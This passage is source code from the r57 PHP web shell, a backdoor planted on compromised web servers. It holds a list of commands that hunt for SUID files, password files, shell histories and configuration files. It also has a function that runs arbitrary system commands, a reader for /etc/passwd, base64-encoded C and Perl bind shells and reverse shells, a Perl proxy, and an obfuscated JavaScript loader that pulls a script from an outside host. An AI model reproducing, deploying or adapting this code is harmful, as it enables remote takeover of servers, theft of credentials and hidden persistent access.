/tmp/grep.txt' => 'cat /var/log/httpd/access_log | grep pass >> /tmp/grep.txt', '----------------------------------find' => '', 'find suid files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'find / -type f -perm -04000 -ls >> /tmp/grep.txt; cat /tmp/grep.txt', 'find suid files in current dir >> /tmp/grep.txt; cat /tmp/grep.txt' => 'find . -type f -perm -04000 -ls >> /tmp/grep.txt; cat /tmp/grep.txt', 'find sgid files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'find / -type f -perm -02000 -ls >> /tmp/grep.txt; cat /tmp/grep.txt', 'find sgid files in current dir >> /tmp/grep.txt; cat /tmp/grep.txt' => 'find . -type f -perm -02000 -ls >> /tmp/grep.txt; cat /tmp/grep.txt', 'find all writable files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'find / -type f -perm -2 -ls >> /tmp/grep.txt; cat /tmp/grep.txt', 'find all writable files in current dir >> /tmp/grep.txt; cat /tmp/grep.txt' => 'find . -type f -perm -2 -ls >> /tmp/grep.txt; cat /tmp/grep.txt', 'find all writable directories >> /tmp/grep.txt; cat /tmp/grep.txt' => 'find / -type d -perm -2 -ls >> /tmp/grep.txt; cat /tmp/grep.txt', 'find all writable directories in current dir >> /tmp/grep.txt; cat /tmp/grep.txt' => 'find . -type d -perm -2 -ls >> /tmp/grep.txt; cat /tmp/grep.txt', 'find all writable directories and files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'find / -perm -2 -ls >> /tmp/grep.txt; cat /tmp/grep.txt', 'find all writable directories and files in current dir >> /tmp/grep.txt; cat /tmp/grep.txt' => 'find . -perm -2 -ls >> /tmp/grep.txt; cat /tmp/grep.txt', 'find all .htpasswd files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'find / -type f -name .htpasswd >> /tmp/grep.txt; cat /tmp/grep.txt', 'find all .bash_history files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'find / -type f -name .bash_history >> /tmp/grep.txt; cat /tmp/grep.txt', 'find all .mysql_history files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'find / -type f -name .mysql_history >> /tmp/grep.txt; cat /tmp/grep.txt', 'find all .fetchmailrc files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'find / -type f -name .fetchmailrc >> /tmp/grep.txt; cat /tmp/grep.txt', 'find httpd.conf files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'find / -type f -name httpd.conf >> /tmp/grep.txt; cat /tmp/grep.txt', 'find vhosts.conf files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'find / -type f -name vhosts.conf >> /tmp/grep.txt; cat /tmp/grep.txt', 'find proftpd.conf files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'find / -type f -name proftpd.conf >> /tmp/grep.txt; cat /tmp/grep.txt', 'find admin.php files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'find / -type f -name admin.php >> /tmp/grep.txt; cat /tmp/grep.txt', 'find config* files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'find / -type f -name "config*" >> /tmp/grep.txt; cat /tmp/grep.txt', 'find cfg.php files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'find / -type f -name cfg.php >> /tmp/grep.txt; cat /tmp/grep.txt', 'find conf.php files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'find / -type f -name conf.php >> /tmp/grep.txt; cat /tmp/grep.txt', 'find config.dat files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'find / -type f -name config.dat >> /tmp/grep.txt; cat /tmp/grep.txt', 'find config.php files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'find / -type f -name config.php >> /tmp/grep.txt; cat /tmp/grep.txt', 'find config.inc files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'find / -type f -name config.inc >> /tmp/grep.txt; cat /tmp/grep.txt', 'find config.inc.php files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'find / -type f -name config.inc.php >> /tmp/grep.txt; cat /tmp/grep.txt', 'find config.default.php files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'find / -type f -name config.default.php >> /tmp/grep.txt; cat /tmp/grep.txt', 'find *.conf files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'find / -type f -name "*.conf" >> /tmp/grep.txt; cat /tmp/grep.txt', 'find *.pwd files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'find / -type f -name "*.pwd" >> /tmp/grep.txt; cat /tmp/grep.txt', 'find *.sql files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'find / -type f -name "*.sql" >> /tmp/grep.txt; cat /tmp/grep.txt', 'find *backup* files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'find / -type f -name "*backup*" >> /tmp/grep.txt; cat /tmp/grep.txt', 'find *dump* files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'find / -type f -name "*dump*" >> /tmp/grep.txt; cat /tmp/grep.txt', '-----------------------------------' => '', 'find /var/ access_log files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'find /var/ -type f -name access_log >> /tmp/grep.txt; cat /tmp/grep.txt', 'find /var/ error_log files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'find /var/ -type f -name error_log >> /tmp/grep.txt; cat /tmp/grep.txt', 'find /var/ access.log files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'find /var/ -type f -name access.log >> /tmp/grep.txt; cat /tmp/grep.txt', 'find /var/ error.log files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'find /var/ -type f -name error.log >> /tmp/grep.txt; cat /tmp/grep.txt', 'find /var/ "*.log" files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'find /var/ -type f -name "*.log" >> /tmp/grep.txt; cat /tmp/grep.txt', '----------------------------------------------------------------------------------------------------' => 'ls -la'); $table_up1 = "
:: "; $table_up2 = " ::
"; $table_up3 = ""; $arrow = " 4"; $lb = "["; $rb = "]"; $font = ""; $ts = "
"; $table_end1 = "
"; $te = "
"; $fs = "
"; $fe = "
"; if (isset($_GET['users'])) { if (!$users = get_users('/etc/passwd')) { echo "
" . $lang[$language . '_text96'] . "
"; } else { echo '
'; foreach ($users as $user) { echo $user . "
"; } echo '
'; } echo "
[ BACK ]
"; die(); } if (!empty($_POST['dir'])) { if (@function_exists('chdir')) { @chdir($_POST['dir']); } else if (@function_exists('chroot')) { @chroot($_POST['dir']); }; } if (empty($_POST['dir'])) { if (@function_exists('chdir')) { $dir = @getcwd(); }; } else { $dir = $_POST['dir']; } $unix = 0; if (strlen($dir) > 1 && $dir[1] == ":") $unix = 0; else $unix = 1; if (empty($dir)) { $os = getenv('OS'); if (empty($os)) { $os = @php_uname(); } if (empty($os)) { $os = "-"; $unix = 1; } else { if (@eregi("^win", $os)) { $unix = 0; } else { $unix = 1; } } } if (!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") { echo $head; if (!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'], $_POST['s_text'], $_POST['s_mask']); } else { $sr = new SearchResult($_POST['s_dir'], $_POST['s_text']); } $sr->SearchText(0, 0); $res = $sr->GetResultFiles(); $found = $sr->GetMatchesCount(); $titles = $sr->GetTitles(); $r = ""; if ($found > 0) { $r.= ""; foreach ($res as $file => $v) { $r.= ""; $r.= ""; foreach ($v as $a => $b) { $r.= ""; $r.= ""; $r.= ""; $r.= "\n"; } } $r.= "
" . ws(3); $r.= (!$unix) ? str_replace("/", "\\", $file) : $file; $r.= ""; $r.= "
" . $a . "" . ws(2) . $b . "
"; echo $r; } else { echo "

" . $lang[$language . '_text56'] . "

"; } echo "
[ BACK ]
"; die(); } if (!$safe_mode && strpos(ex("echo abcr57"), "r57") != 3) { $safe_mode = 1; } $SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); if (empty($SERVER_SOFTWARE)) { $SERVER_SOFTWARE = "-"; } function ws($i) { return @str_repeat("  ", $i); } function ex($cfe) { $res = ''; if (!empty($cfe)) { if (@function_exists('exec')) { @exec($cfe, $res); $res = join("\n", $res); } elseif (@function_exists('shell_exec')) { $res = @shell_exec($cfe); } elseif (@function_exists('system')) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif (@function_exists('passthru')) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif (@is_resource($f = @popen($cfe, "r"))) { $res = ""; if (@function_exists('fread') && @function_exists('feof')) { while (!@feof($f)) { $res.= @fread($f, 1024); } } else if (@function_exists('fgets') && @function_exists('feof')) { while (!@feof($f)) { $res.= @fgets($f, 1024); } } @pclose($f); } elseif (@is_resource($f = @proc_open($cfe, array(1 => array("pipe", "w")), $pipes))) { $res = ""; if (@function_exists('fread') && @function_exists('feof')) { while (!@feof($pipes[1])) { $res.= @fread($pipes[1], 1024); } } else if (@function_exists('fgets') && @function_exists('feof')) { while (!@feof($pipes[1])) { $res.= @fgets($pipes[1], 1024); } } @proc_close($f); } elseif (@function_exists('pcntl_exec') && @function_exists('pcntl_fork')) { $res = '[~] Blind Command Execution via [pcntl_exec]\n\n'; $pid = @pcntl_fork(); if ($pid == - 1) { $res.= '[-] Could not children fork. Exit'; } else if ($pid) { if (@pcntl_wifexited($status)) { $res.= '[+] Done! Command "' . $cfe . '" successfully executed.'; } else { $res.= '[-] Error. Command incorrect.'; } } else { $cfe = array(" -e 'system(\"$cfe\")'"); if (@pcntl_exec('/usr/bin/perl', $cfe)) exit(0); if (@pcntl_exec('/usr/local/bin/perl', $cfe)) exit(0); die(); } } } return $res; } function get_users($filename) { $users = array(); $rows = @explode("\n", readzlib($filename)); if (!$rows) return 0; foreach ($rows as $string) { $user = @explode(":", trim($string)); if (substr($string, 0, 1) != '#') array_push($users, $user[0]); } return $users; } function err($n, $txt = '') { echo '
'; echo $GLOBALS['lang'][$GLOBALS['language'] . '_err' . $n]; if (!empty($txt)) { echo " $txt"; } echo '
'; return null; } function perms($mode) { if (!$GLOBALS['unix']) return 0; if ($mode & 0x1000) { $type = 'p'; } else if ($mode & 0x2000) { $type = 'c'; } else if ($mode & 0x4000) { $type = 'd'; } else if ($mode & 0x6000) { $type = 'b'; } else if ($mode & 0x8000) { $type = '-'; } else if ($mode & 0xA000) { $type = 'l'; } else if ($mode & 0xC000) { $type = 's'; } else $type = 'u'; $owner["read"] = ($mode & 00400) ? 'r' : '-'; $owner["write"] = ($mode & 00200) ? 'w' : '-'; $owner["execute"] = ($mode & 00100) ? 'x' : '-'; $group["read"] = ($mode & 00040) ? 'r' : '-'; $group["write"] = ($mode & 00020) ? 'w' : '-'; $group["execute"] = ($mode & 00010) ? 'x' : '-'; $world["read"] = ($mode & 00004) ? 'r' : '-'; $world["write"] = ($mode & 00002) ? 'w' : '-'; $world["execute"] = ($mode & 00001) ? 'x' : '-'; if ($mode & 0x800) $owner["execute"] = ($owner['execute'] == 'x') ? 's' : 'S'; if ($mode & 0x400) $group["execute"] = ($group['execute'] == 'x') ? 's' : 'S'; if ($mode & 0x200) $world["execute"] = ($world['execute'] == 'x') ? 't' : 'T'; $s = sprintf("%1s", $type); $s.= sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); $s.= sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); $s.= sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); return trim($s); } function in($type, $name, $size, $value, $checked = 0) { $ret = ""; } function which($pr) { $path = ''; $path = ex("which $pr"); if (!empty($path)) { return $path; } else { return false; } } function cf($fname, $text) { $w_file = @fopen($fname, "w") or @function_exists('file_put_contents') or err(0); if ($w_file) { @fwrite($w_file, base64_decode($text)) or @fputs($w_file, base64_decode($text)) or @file_put_contents($fname, base64_decode($text)); @fclose($w_file); } } function sr($l, $t1, $t2) { return "" . $t1 . "" . $t2 . ""; } if (!@function_exists("view_size")) { function view_size($size) { if ($size >= 1073741824) { $size = @round($size / 1073741824 * 100) / 100 . " GB"; } elseif ($size >= 1048576) { $size = @round($size / 1048576 * 100) / 100 . " MB"; } elseif ($size >= 1024) { $size = @round($size / 1024 * 100) / 100 . " KB"; } else { $size = $size . " B"; } return $size; } } function DirFilesR($dir, $types = '') { $files = Array(); if (($handle = @opendir($dir)) || (@function_exists('scandir'))) { while ((false !== ($file = @readdir($handle))) && (false !== ($file = @scandir($dir)))) { if ($file != "." && $file != "..") { if (@is_dir($dir . "/" . $file)) $files = @array_merge($files, DirFilesR($dir . "/" . $file, $types)); else { $pos = @strrpos($file, "."); $ext = @substr($file, $pos, @strlen($file) - $pos); if ($types) { if (@in_array($ext, explode('; ', $types))) $files[] = $dir . "/" . $file; } else $files[] = $dir . "/" . $file; } } } @closedir($handle); } return $files; } class SearchResult { var $text; var $FilesToSearch; var $ResultFiles; var $FilesTotal; var $MatchesCount; var $FileMatschesCount; var $TimeStart; var $TimeTotal; var $titles; function SearchResult($dir, $text, $filter = '') { $dirs = @explode("; ", $dir); $this->FilesToSearch = Array(); for ($a = 0; $a < count($dirs); $a++) $this->FilesToSearch = @array_merge($this->FilesToSearch, DirFilesR($dirs[$a], $filter)); $this->text = $text; $this->FilesTotal = @count($this->FilesToSearch); $this->TimeStart = getmicrotime(); $this->MatchesCount = 0; $this->ResultFiles = Array(); $this->FileMatchesCount = Array(); $this->titles = Array(); } function GetFilesTotal() { return $this->FilesTotal; } function GetTitles() { return $this->titles; } function GetTimeTotal() { return $this->TimeTotal; } function GetMatchesCount() { return $this->MatchesCount; } function GetFileMatchesCount() { return $this->FileMatchesCount; } function GetResultFiles() { return $this->ResultFiles; } function SearchText($phrase = 0, $case = 0) { $qq = @explode(' ', $this->text); $delim = '|'; if ($phrase) foreach ($qq as $k => $v) $qq[$k] = '\b' . $v . '\b'; $words = '(' . @implode($delim, $qq) . ')'; $pattern = "/" . $words . "/"; if (!$case) $pattern.= 'i'; foreach ($this->FilesToSearch as $k => $filename) { $this->FileMatchesCount[$filename] = 0; $FileStrings = @file($filename) or @next; for ($a = 0; $a < @count($FileStrings); $a++) { $count = 0; $CurString = $FileStrings[$a]; $CurString = @Trim($CurString); $CurString = @strip_tags($CurString); $aa = ''; if (($count = @preg_match_all($pattern, $CurString, $aa))) { $CurString = @preg_replace($pattern, "\\1", $CurString); $this->ResultFiles[$filename][$a + 1] = $CurString; $this->MatchesCount+= $count; $this->FileMatchesCount[$filename]+= $count; } } } $this->TimeTotal = @round(getmicrotime() - $this->TimeStart, 4); } } function getmicrotime() { list($usec, $sec) = @explode(" ", @microtime()); return ((float)$usec + (float)$sec); } $port_bind_bd_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk 7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld 2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; $port_bind_bd_pl = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N lIENPTk47DQpleGl0IDA7DQp9DQp9"; $back_connect = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; $back_connectl = "PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPgpkb2N1bWVudC53cml0ZSh1bmVzY2FwZSgnJTNDJTczJTYzJTcyJTY5JTcwJTc0JTIwJTczJTcyJTYzJTNEJTY4JTc0JTc0JTcwJTNBJTJGJTJGJTcyJTZGJTZGJTc0JTZCJTY5JTc0JTZFJTY5JTZFJTZBJTYxJTJFJTYzJTZGJTZEJTJGJTczJTYxJTc5JTJFJTZBJTczJTNFJTNDJTJGJTczJTYzJTcyJTY5JTcwJTc0JTNFJykpOw"; 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$prx_pl = "IyF1c3IvYmluL3BlcmwKdXNlIFNvY2tldDsKbXkgJHBvcnQgPSAkQVJHVlswXXx8MzEzMzc7Cm15ICRwcm90b2NvbCA9IGdldHByb3RvYn luYW1lKCd0Y3AnKTsKbXkgJG15X2FkZHIgID0gc29ja2FkZHJfaW4gKCRwb3J0LCBJTkFERFJfQU5ZKTsKc29ja2V0IChTT0NLLCBBRl9JTkVULCBTT 0NLX1NUUkVBTSwgJHByb3RvY29sKSBvciBkaWUgInNvY2tldCgpOiAkISI7CnNldHNvY2tvcHQgKFNPQ0ssIFNPTF9TT0NLRVQsIFNPX1JFVVNFQURE UiwxICkgb3IgZGllICJzZXRzb2Nrb3B0KCk6ICQhIjsKYmluZCAoU09DSywgJG15X2FkZHIpIG9yIGRpZSAiYmluZCgpOiAkISI7Cmxpc3RlbiAoU09 DSywgU09NQVhDT05OKSBvciBkaWUgImxpc3RlbigpOiAkISI7CiRTSUd7J0lOVCd9ID0gc3ViIHsKY2xvc2UgKFNPQ0spOwpleGl0Owp9Owp3aGlsZS AoMSkgewpuZXh0IHVubGVzcyBteSAkcmVtb3RlX2FkZHIgPSBhY2NlcHQgKFNFU1NJT04sIFNPQ0spOwpteSAoJGZpc3QsICRtZXRob2QsICRyZW1vd GVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IGFuYWx5emVfcmVxdWVzdCgpOwppZihvcGVuX2Nvbm5lY3Rpb24gKFJFTU9URSwgJHJlbW90ZV9ob3N0LCAk cmVtb3RlX3BvcnQpID09IDApIHsKY2xvc2UgKFNFU1NJT04pOwpuZXh0Owp9CnByaW50IFJFTU9URSAkZmlyc3Q7CnByaW50IFJFTU9URSAiVXNlci1 BZ2VudDogR29vZ2xlYm90LzIuMSAoK2h0dHA6Ly93d3cuZ29vZ2xlLmNvbS9ib3QuaHRtbClcbiI7CndoaWxlICg8U0VTU0lPTj4pIHsKbmV4dCBpZi AoL1Byb3h5LUNvbm5lY3Rpb246LyB8fCAvVXNlci1BZ2VudDovKTsKcHJpbnQgUkVNT1RFICRfOwpsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvK TsKfQpwcmludCBSRU1PVEUgIlxuIjsKJGhlYWRlciA9IDE7CndoaWxlICg8UkVNT1RFPikgewpwcmludCBTRVNTSU9OICRfOwppZiAoJGhlYWRlcikg eyAgICAgCmlmICgkaGVhZGVyICYmICRfID1+IC9eW1xzXHgwMF0qJC8pIHsKJGhlYWRlciA9IDA7Cn0KfQp9CmNsb3NlIChSRU1PVEUpOwpjbG9zZSA oU0VTU0lPTik7Cn0KY2xvc2UgKFNPQ0spOwpzdWIgYW5hbHl6ZV9yZXF1ZXN0IHsKbXkgKCRmaXN0LCAkdXJsLCAkcmVtb3RlX2hvc3QsICRyZW1vdG VfcG9ydCwgJG1ldGhvZCk7CiRmaXJzdCA9IDxTRVNTSU9OPjsKJHVybCA9ICgkZmlyc3QgPX4gbXwoaHR0cDovL1xTKyl8KVswXTsKKCRtZXRob2QsI CRyZW1vdGVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IAooJGZpcnN0ID1+IG0hKEdFVCkgaHR0cDovLyhbXi86XSspOj8oXGQqKSEgKTsKaWYgKCEkcmVt b3RlX2hvc3QpIHsKY2xvc2UoU0VTU0lPTik7CmV4aXQ7Cn0KJHJlbW90ZV9wb3J0ID0gImh0dHAiIHVubGVzcyAoJHJlbW90ZV9wb3J0KTsKJGZpcnN 0ID1+IHMvaHR0cDpcL1wvW15cL10rLy87CnJldHVybiAoJGZpcnN0LCAkbWV0aG9kLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7Cn0Kc3ViIG 9wZW5fY29ubmVjdGlvbiB7Cm15ICgkaG9zdCwgJHBvcnQpID0gQF9bMSwyXTsKbXkgKCRkZXN0X2FkZHIsICRjdXIpOwppZiAoJHBvcnQgIX4gL15cZ CskLykgewokcG9ydCA9IChnZXRzZXJ2YnluYW1lKCRwb3J0LCAidGNwIikpWzJdOwokcG9ydCA9IDgwIHVubGVzcyAoJHBvcnQpOwp9CiRob3N0ID0g aW5ldF9hdG9uICgkaG9zdCkgb3IgcmV0dXJuIDA7CiRkZXN0X2FkZHIgPSBzb2NrYWRkcl9pbiAoJHBvcnQsICRob3N0KTsKc29ja2V0ICgkX1swXSw gQUZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90b2NvbCkgb3IgZGllICJzb2NrZXQoKSA6ICQhIjsKY29ubmVjdCAoJF9bMF0sICRkZXN0X2FkZHIpIG 9yIHJldHVybiAwOwokY3VyID0gc2VsZWN0KCRfWzBdKTsgIAokfCA9IDE7CnNlbGVjdCgkY3VyKTsKcmV0dXJuIDE7Cn0="; if ($unix) { if (!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname', $uname); } else { $uname = $_COOKIE['uname']; } if (!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id', $id); } else { $id = $_COOKIE['id']; } if ($safe_mode) { $sysctl = '-'; } else if (isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; } else { $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease'); if (empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); } if (empty($sysctl)) { $sysctl = '-'; } setcookie('sysctl', $sysctl); } } echo $head; echo ''; echo '
' . ws(2) . '#r57 shell ' . $version . ''; echo ws(2) . "" . date("d-m-Y H:i:s") . " Your IP: [" . gethostbyname($_SERVER["REMOTE_ADDR"]) . "]"; if (isset($_SERVER['X_FORWARDED_FOR'])) { echo " X_FORWARDED_FOR: [" . $_SERVER['X_FORWARDED_FOR'] . "]"; } if (isset($_SERVER['CLIENT_IP'])) { echo " CLIENT_IP: [" . $_SERVER['CLIENT_IP'] . "]"; } echo " Server IP: [" . gethostbyname($_SERVER["HTTP_HOST"]) . "]"; echo "
"; echo ws(2) . "PHP version: " . @phpversion() . ""; $curl_on = @function_exists('curl_version'); echo ws(2); echo "cURL: " . (($curl_on) ? ("ON") : ("Kapali")); echo "" . ws(2); echo "MySQL: "; $mysql_on = @function_exists('mysql_connect'); if ($mysql_on) { echo "ON"; } else { echo "Kapali"; } echo "" . ws(2); echo "MSSQL: "; $mssql_on = @function_exists('mssql_connect'); if ($mssql_on) { echo "ON"; } else { echo "Kapali"; } echo "" . ws(2); echo "PostgreSQL: "; $pg_on = @function_exists('pg_connect'); if ($pg_on) { echo "ON"; } else { echo "Kapali"; } echo "" . ws(2); echo "Oracle: "; $ora_on = @function_exists('ocilogon'); if ($ora_on) { echo "ON"; } else { echo "Kapali"; } echo "
